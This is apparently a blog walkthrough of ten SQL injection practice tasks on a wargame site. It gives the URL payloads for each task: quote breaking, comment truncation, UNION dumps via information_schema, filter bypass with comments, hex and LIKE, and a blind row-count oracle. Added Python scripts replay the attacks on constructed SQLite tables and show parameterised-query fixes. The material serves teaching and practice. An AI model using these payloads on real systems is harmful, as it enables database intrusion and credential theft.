Solving sql injection tasks from alexbers.com/sql
I want to share with Habrahabr examples of my solutions to the SQL injection tasks on the alexbers website.
Example 1: www.alexbers.com/sql/1.php
This first one is hardly a challenge: you are asked to write the query yourself, and the table and field names are given up front.
Given: Table: users Fields: id, login, pass
Solution:
select * from users where id = '12'
and the link will look like this:
https://www.alexbers.com/sql/1.php?text=select+*+from+users+where+id%3D%2712%27
Just the query built from everything we are told.
Example 2: www.alexbers.com/sql/qnbutn2.php
We are shown the query:
select * from users where id = 2 or login = '$text'
Given:
Table: users. Fields: id, login, pass. Requirement: Hooray, I know the answer (the password of the user with id = 9):
This example shows the most primitive vulnerability: the input is not filtered at all, so we can use a quotation mark:
https://www.alexbers.com/sql/qnbutn2.php?text=-1' or id='9
What have we done? We turned the query into this:
select * from users where id = 2 or login = '-1' or id = '9'
We are selecting the user with id=2, or the user with login=-1, or the user with id=9 from the users table; the last value is opened by our own quote on the left and closed by the quote already present in the original query. Since no user with login -1 exists, that condition matches nothing, but id=9 does exist. As a result we get two rows: the user with id=2 and the user with id=9.

Example 3: www.alexbers.com/sql/sdjjy3.php
Again the query is shown:
select * from users where id = 2 or login = '$text' limit 1
Given:
Table: users. Fields: id, login, pass. Requirement: Hooray, I know the answer (the password of the user with id = 13):
The difference from the previous example is that the output is limited to one row. That restriction vanishes once we append a comment that cuts off the end of the query, so the limit clause is never parsed.
Solution:
https://www.alexbers.com/sql/sdjjy3.php?text=-1' or id=13 -- 123
The query becomes:
select * from users where id = 2 or login = '-1' or id=13 -- 123' limit 1
Thus, we throw out the restriction and extract the user with id = 13.
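To see exactly what the quote and the comment do to these two queries, here is an added example (my code, not part of the original write-up or of alexbers.com): a small Python script that rebuilds the task 2 and task 3 queries over a constructed SQLite users table, runs the payloads against them, and then runs the same payload through a parameterised version of the query. SQLite stands in for MySQL; the queries themselves are the ones shown above.

```python
import sqlite3


def make_db():
    """Constructed users table with the ids the tasks ask for (2 is the row the
    query always returns, 9 is task 2's target, 13 is task 3's target)."""
    con = sqlite3.connect(":memory:")
    con.executescript("""
        create table users(id integer primary key, login text, pass text);
        insert into users values (1, 'admin', 'pw1'), (2, 'guest', 'pw2'),
                                 (9, 'nine', 'pw9'), (13, 'thirteen', 'pw13');
    """)
    return con


# The two server-side queries from tasks 2 and 3; {text} is the raw GET parameter.
TASK2 = "select * from users where id = 2 or login = '{text}'"
TASK3 = "select * from users where id = 2 or login = '{text}' limit 1"


def vulnerable(con, template, text):
    """Builds the query the way the PHP page does: string concatenation, no escaping.
    Returns the ids of the rows the page would print."""
    return [row[0] for row in con.execute(template.format(text=text))]


def safe(con, template, text):
    """Same query with the literal replaced by a bound parameter: whatever the input
    contains, it can only ever be compared against the login column."""
    query = template.replace("'{text}'", "?")
    return [row[0] for row in con.execute(query, (text,))]


if __name__ == "__main__":
    con = make_db()
    # Task 2: close the string early and append our own condition.
    print(vulnerable(con, TASK2, "-1' or id='9"))          # [2, 9]
    # Task 3: 'limit 1' hides the second row ...
    print(vulnerable(con, TASK3, "-1' or id='13"))         # [2]
    # ... until a comment swallows the rest of the query.  (MySQL needs whitespace
    # after '--', which is why the page appends ' 123'; SQLite does not care.)
    print(vulnerable(con, TASK3, "-1' or id=13 -- "))      # [2, 13]
    # With parameter binding the same payload is just a login that does not exist.
    print(safe(con, TASK3, "-1' or id=13 -- "))            # [2]
```

The parameterised variant is the fix for every task on this page: the login value never becomes part of the SQL text, so neither the quote nor the comment marker has any effect.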
Example 4: www.alexbers.com/sql/qjqhweh4.php
Query:
select * from users where id = 2 or login = '$text' limit 1
Given:
Tables: users, secret. Fields: id, login, pass (in users); the secret table has 3 fields. Requirement: Hooray, I know the answer (the row of the secret table whose ggg field equals abc):
A bit more interesting. Now there are two tables, and the query does not touch the one we need. We use the classic approach: MySQL has an operator that lets one query read from several tables by gluing their result sets together, and for the results to be combined, every part must return the same number of columns. That operator is UNION. For this task we need the row of the secret table whose ggg field equals abc. The column counts already match (3 in users, 3 in secret), so the query takes the form:
https://www.alexbers.com/sql/qjqhweh4.php?text=-1' union select * from secret where ggg='abc' -- 123
One of the results will be the answer to the level.
Example 5: www.alexbers.com/sql/sdfkjsdk5.php
Query:
select * from users where id = 2 or login = '$text' limit 1
Given:
Tables: users, secret. Fields: id, login, pass (in users); the secret table has 2 fields. Requirement: Hooray, I know the answer (the contents of the secret table):
Let's repeat the previous example. We already know how many columns the users table has (3); now we need the columns of the secret table, so we pull their list from information_schema. This time the column counts do not match (secret has fewer), so the union has to be padded with dummy values to make three columns:
https://www.alexbers.com/sql/sdfkjsdk5.php?text=1' union select 1, concat_ws(0x3a, table_name, column_name), 3 from information_schema.columns where table_name='secret' -- 123
We see that the secret table has 2 columns; now we extract their values, padding again to three columns:
https://www.alexbers.com/sql/sdfkjsdk5.php?text=-1' union select 1, dfgdfgfdg, dfgfddfgdfdfdf from secret -- 123
We see the answer.
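The column-count probing and the information_schema lookup from tasks 4 and 5, as an added example (my code, not the page's or the site's) over a constructed SQLite copy of the two tables. The secret table's column names here are mine. Two substitutions for SQLite: pragma_table_info('secret') plays the role of information_schema.columns, and a text marker in the first column tells injected rows apart from the id=2 row the page always returns.

```python
import sqlite3


def make_db():
    """Constructed tables: users as in the tasks, plus a two-column secret table
    (column names are mine; the task's differ)."""
    con = sqlite3.connect(":memory:")
    con.executescript("""
        create table users(id integer primary key, login text, pass text);
        insert into users values (1, 'admin', 'pw1'), (2, 'guest', 'pw2');
        create table secret(ggg text, zzz text);
        insert into secret values ('abc', 'flag{constructed}'), ('xyz', 'nothing here');
    """)
    return con


TEMPLATE = "select * from users where id = 2 or login = '{text}' limit 1"


def app(con, text):
    """The page: returns the rows it would display, or None when the query errors."""
    try:
        return con.execute(TEMPLATE.format(text=text)).fetchall()
    except sqlite3.Error:
        return None


def count_columns(con, max_cols=10):
    """UNION needs equal column counts on both sides: grow the right-hand side
    until the database stops complaining."""
    for n in range(1, max_cols + 1):
        cols = ", ".join(str(i) for i in range(1, n + 1))
        if app(con, f"-1' union select {cols} -- ") is not None:
            return n
    return None


def secret_columns(con):
    """Column names of secret via pragma_table_info (SQLite's counterpart of
    information_schema.columns).  The 'schema' marker and the type column pad the
    row out to the three columns users has and flag the injected rows."""
    rows = app(con, "-1' union select 'schema', name, type "
                    "from pragma_table_info('secret') -- ")
    return [name for marker, name, _ in rows if marker == "schema"]


def dump_secret(con, columns):
    """Read every row of secret through the same three-column union."""
    rows = app(con, f"-1' union select 'secret', {columns[0]}, {columns[1]} "
                    "from secret -- ")
    return [(a, b) for marker, a, b in rows if marker == "secret"]


if __name__ == "__main__":
    con = make_db()
    n = count_columns(con)                  # 3
    cols = secret_columns(con)              # ['ggg', 'zzz']
    print(n, cols, dump_secret(con, cols))  # ... [('abc', 'flag{constructed}'), ...]
```

Probing with `union select 1`, `1, 2`, `1, 2, 3` is the general form of what the page does by already knowing users has three fields; `order by N` works as well when the error is hidden but the row order still changes.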
Example 6: www.alexbers.com/sql/skldj6
Query:
select * from users where id = $text limit 1
Given:
Tables: users. Fields: id, login, pass. Quotation marks are filtered and only one row is output. Requirement: Hooray, I know the answer (the password of the user with the nickname god):
Here we see a misunderstanding of how the mysql_real_escape_string filter works: it escapes quotation marks, which is useless when the value of the id variable is not placed in quotation marks at all. Quotes may be filtered fifty times over; we simply do not need them, because a string for a text field can be produced with the CHAR() function or written as a hex literal:
https://www.alexbers.com/sql/skldj6.php?text=-1 union select id, login, pass from users where login = 0x676f64
Example 7: www.alexbers.com/sql/dsfhsdjkf7.php
Given:
Tables: users. Fields: id, login, pass. Now only the first row of the result is displayed (the rest are hidden). The characters ', ", +, =, comma, space and brackets are filtered. Requirement: Hooray, I know the answer (the password of the user whose nickname contains gentoo):
Query:
select * from users where id = $text limit 1
Since the selection already goes to the table we need, a second query is not even required. Spaces are replaced with the comments /**/ and /*!*/; the only remaining problem is that the equals sign is filtered, but it can be bypassed with the LIKE operator. Comparing against a string would require quotation marks, so we encode the string in hex. We also do not know the exact nickname we are looking for, so we use a wildcard search with % on both sides of the login. The resulting attack vector:
https://www.alexbers.com/sql/dsfhsdjkf7.php?text=-1/*!or/*!login*/like/**/0x2567656e746f6f25
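An added example (my code, not the page's) for tasks 6 and 7 over a constructed SQLite table: first a quote-escaping filter that is defeated because the value is numeric and never quoted, then a denylist that blocks quotes, +, =, commas and spaces, bypassed with /**/ comments, LIKE and a string assembled from char() calls. One deviation, stated so it is not mistaken for the task: SQLite has no quote-free hex string literal like MySQL's 0x2567656e746f6f25, so the denylist here leaves brackets unfiltered and the pattern is spelled as char(37)||char(103)||... instead.

```python
import sqlite3


def make_db():
    """Constructed users table: 'god' is task 6's target, 'gentoo_fan' task 7's."""
    con = sqlite3.connect(":memory:")
    con.executescript("""
        create table users(id integer primary key, login text, pass text);
        insert into users values (1, 'admin', 'pw1'), (2, 'guest', 'pw2'),
                                 (3, 'god', 't0pSecret'), (4, 'gentoo_fan', 'emerge');
    """)
    return con


# Both tasks build this query; only the first row is shown.
TEMPLATE = "select * from users where id = {text} limit 1"


def escape_quotes(text):
    """Stand-in for mysql_real_escape_string: backslash-escapes quotes and backslashes.
    Pointless here, because $text is never inside quotes in the first place."""
    return text.replace("\\", "\\\\").replace("'", "\\'").replace('"', '\\"')


def task6(con, text):
    rows = con.execute(TEMPLATE.format(text=escape_quotes(text))).fetchall()
    return rows[0] if rows else None


# Task 7's denylist.  Deviation from the task: brackets are not blocked, because
# SQLite has no quote-free string literal other than char().
TASK7_BLOCKED = set("'\"+=, ")


def task7(con, text):
    if any(c in TASK7_BLOCKED for c in text):
        return None                      # request refused by the filter
    rows = con.execute(TEMPLATE.format(text=text)).fetchall()
    return rows[0] if rows else None


def quoteless(s):
    """Spell a string with neither quotes nor commas: char(37)||char(103)||..."""
    return "||".join(f"char({ord(c)})" for c in s)


def raises_sql_error(fn, *args):
    try:
        fn(*args)
        return False
    except sqlite3.Error:
        return True


# Task 6: quotes get escaped, so spell 'god' with CHAR() (MySQL: 0x676f64 works too).
PAYLOAD6 = "-1 union select id, login, pass from users where login = char(103,111,100)"
# Task 7: comments instead of spaces, LIKE instead of '=', %gentoo% without quotes.
PAYLOAD7 = "-1/**/or/**/login/**/like/**/" + quoteless("%gentoo%")

if __name__ == "__main__":
    con = make_db()
    print(raises_sql_error(task6, con, "-1 or login='god'"))  # True: the quote is escaped
    print(task6(con, PAYLOAD6))                                # (3, 'god', 't0pSecret')
    print(task7(con, "-1 or login like '%gentoo%'"))           # None: filter refused it
    print(task7(con, PAYLOAD7))                                # (4, 'gentoo_fan', 'emerge')
```

The lesson of both filters is the same: a denylist of characters argues with the tokenizer, and the tokenizer has more ways to spell a space, an equals sign or a string than the list covers. Casting the id to an integer, or binding it as a parameter, removes the whole class.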
Example 8: www.alexbers.com/sql/qqqwwweeerrr8.php
Query:
select * from users where id = $text
Given:
Tables: users. Fields: id, login, pass. Hint: error messages are not displayed. Requirement: Hooray, I know the answer (the password of the user with the nickname fast):
The only things the page ever tells us are that some error occurred, or how many records were returned. That record count is the only number we can influence. We are asked for a user's password, which is alphanumeric, while all we can work with is numbers, so the password has to be expressed numerically: translating every character into its ASCII code turns each character into a number. We use the mid() function to cut out a single character and ascii() to get its code, and the attack vector becomes:
https://www.alexbers.com/sql/qqqwwweeerrr8.php?text=-1 or id <= (select ascii(mid(pass,1,1)) from users where login='fast')
The number of records returned is the ASCII code of the first character of the password (every row whose id is at most that code matches, so the count equals the code). Then we make the same request for the second character, and so on.
Example 9: www.alexbers.com/sql/almost9.php
Tables: users. Fields: id, login, pass. Query: select * from users where id = $text. Requirement: Hooray, I know the answer (the numerical sum of the logins of users with 20 <= id <= 30).
So we need to take the numerical value of each login and add them up, using the same comparison as in the previous task. The table has 1069 rows, so the whole sum cannot be displayed in one query; the attack vector is therefore split into 2 queries, one for the quotient and one for the remainder:
https://www.alexbers.com/sql/almost9.php?text=-1 or id <= cast((select sum(login) from users where id between 20 and 30) as signed integer) / 10
https://www.alexbers.com/sql/almost9.php?text=-1 or id <= MOD(cast((select sum(login) from users where id between 20 and 30) as signed integer), 10)
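The count oracle of task 8 and the split-into-digits trick of task 9 share one extraction routine, so here is one added example (my code, not the page's) that serves both, over a constructed SQLite table with 200 contiguous ids. unicode() and substr() stand in for MySQL's ascii() and mid(). The generalisation over the page is that any non-negative integer expression is read out digit by digit with integer division and modulo, so the sum in task 9 does not have to be split by hand into /10 and MOD 10, and the same routine reads the character codes of task 8.

```python
import sqlite3


def make_db(n_rows=200):
    """Constructed stand-in for the task's users table: ids 1..n_rows are contiguous,
    which is what makes 'number of rows returned' equal to the injected number."""
    con = sqlite3.connect(":memory:")
    con.execute("create table users(id integer primary key, login text, pass text)")
    for i in range(1, n_rows + 1):
        if 20 <= i <= 30:
            login = str(i * 1000)          # numeric logins, as task 9 needs
        elif i == 150:
            login = "fast"                 # the user whose password task 8 asks for
        else:
            login = f"user{i}"
        pw = "s3cr3t" if login == "fast" else f"pw{i}"
        con.execute("insert into users values (?, ?, ?)", (i, login, pw))
    return con


def row_count(con, text):
    """The vulnerable page: runs 'select * from users where id = $text' and reveals
    only how many rows came back (errors are not shown there; here they propagate)."""
    return len(con.execute(f"select * from users where id = {text}").fetchall())


def leak_int(con, expr):
    """Read the non-negative integer value of the SQL expression `expr`, one decimal
    digit at a time.  With contiguous ids, '-1 or id <= v' returns exactly v rows as
    long as v does not exceed the table size, so a digit 0..9 is read directly.
    Integer division by 10**k followed by % 10 isolates digit k; the loop stops when
    the quotient itself is 0 (or NULL, which also matches no row)."""
    value, k = 0, 0
    while True:
        quotient = f"(cast(({expr}) as integer) / {10 ** k})"
        if row_count(con, f"-1 or id <= {quotient}") == 0:
            return value
        digit = row_count(con, f"-1 or id <= {quotient} % 10")
        value += digit * 10 ** k
        k += 1


def leak_password(con, login):
    """Task 8: code of each character via unicode(substr(...)); unicode('') is NULL
    past the end of the string, so the count drops to 0 and the loop stops."""
    chars = []
    while True:
        code = leak_int(con, f"select unicode(substr(pass, {len(chars) + 1}, 1)) "
                             f"from users where login = '{login}'")
        if code == 0:
            return "".join(chars)
        chars.append(chr(code))


def leak_login_sum(con, lo=20, hi=30):
    """Task 9: the numeric sum of the logins with lo <= id <= hi, a value far larger
    than the row count, so it only comes out digit by digit."""
    return leak_int(con, f"select sum(cast(login as integer)) from users "
                         f"where id between {lo} and {hi}")


if __name__ == "__main__":
    con = make_db()
    print("fast's password:", leak_password(con, "fast"))   # s3cr3t
    print("sum of logins 20..30:", leak_login_sum(con))      # 275000
```

Each digit costs two requests (one to test whether any digits remain, one for the digit itself), so a six-character password takes a few dozen requests; on a table whose ids are not contiguous the count no longer equals the value and the same oracle has to be driven as a yes/no comparison with a binary search instead.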
Example 10
The solution to the 10th task is already described on YouTube, you can see it here: www.youtube.com/watch?v=dLSxTGvwcLw